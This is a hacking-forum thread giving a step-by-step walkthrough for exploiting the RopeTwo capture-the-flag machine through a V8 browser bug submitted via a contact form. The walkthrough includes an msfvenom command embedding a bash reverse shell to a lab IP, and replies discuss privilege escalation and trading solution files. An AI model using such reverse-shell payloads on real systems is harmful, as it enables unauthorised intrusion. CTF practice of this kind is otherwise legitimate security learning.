TUTORIAL RopeTwo
by terobau - October 27, 2020 at 04:48 PM
#1
Here comes the exploit for rope2, this will only give you the shell in the box. User Part coming soon.

first create two files. index.html and pwn.js

copy the contents from following link and make sure to change ip in index.html
for index.html

https://ghostbin.co/paste/3arp6c2

for pwn.js

https://ghostbin.co/paste/7sprd

generate shellcode

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'


replace the your generated shellcode with the shellcode in pwn.js [line: 94]

now start python http server on port 8080[if you want to change port make sure to change it on index.html too] and netcat listner on your selected port[use same port that you used while generating shellcode]

head over to http://10.10.10.196:8000/contact

type anything in name and subject but paste the contents of index.html in message box, click on send
if everything works fine you should gave a shell as chromeuser

for those who want to know what's going on
https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

v8 used in rope2 box is exactly compiled the with same patch as show in blog, but later pointer compression was added the exploit shown in blog works no more, tweaking exploit little bit should work.


Have a sweet reverse shell
#2
thank you!!! Please someone bring a nobel prize for this guy
#3
thank you but there is no any user.txt ad its permission denied to access r4j
#4
really you got the shell with this
scripts lolz
#5
(October 30, 2020 at 02:24 AM)lamehacker Wrote: really you got the shell with this
scripts lolz


why?
do you have any problem?
#6
(October 30, 2020 at 03:21 AM)terobau Wrote:
(October 30, 2020 at 02:24 AM)lamehacker Wrote: really you got the shell with this
scripts lolz


why?
do you have any problem?

the server dont get my page. idont know why
#7
anyone moved on to user until now?
#8
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j

But how can i escalate from this binary?
#9
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j


nice, a restricted shell. But how to escape ?
#10
(November 02, 2020 at 05:27 PM)dory23 Wrote:
(November 02, 2020 at 04:55 PM)mandoline Wrote:
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j


nice, a restricted shell. But how to escape ?

use google and there is a website that has the enough documentation about this shell and how do  they work

It's not a restricted shell that you are thinking, download the binary and reverse it.....
It has got UAF
#11
(November 04, 2020 at 02:16 AM)D0v3 Wrote: RopeTwo user and easy root:

[Hidden Content]

zip file password protected!!!
What is the password?
#12
(November 04, 2020 at 04:50 AM)Consigliere Wrote:
(November 04, 2020 at 02:16 AM)D0v3 Wrote: RopeTwo user and easy root:

[Hidden Content]

zip file password protected!!!
What is the password?

root hash

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG RopeTwo hehe6873 0 432 April 02, 2021 at 05:25 AM
Last Post: hehe6873
BUYING ROPETWO ROOT HASH (Buying) 0xvijay 18 2,783 January 11, 2021 at 04:39 AM
Last Post: nero007
TUTORIAL RopeTwo Doop3r 20 3,644 January 01, 2021 at 09:17 PM
Last Post: Buttmuncher

 Users browsing this thread: 1 Guest(s)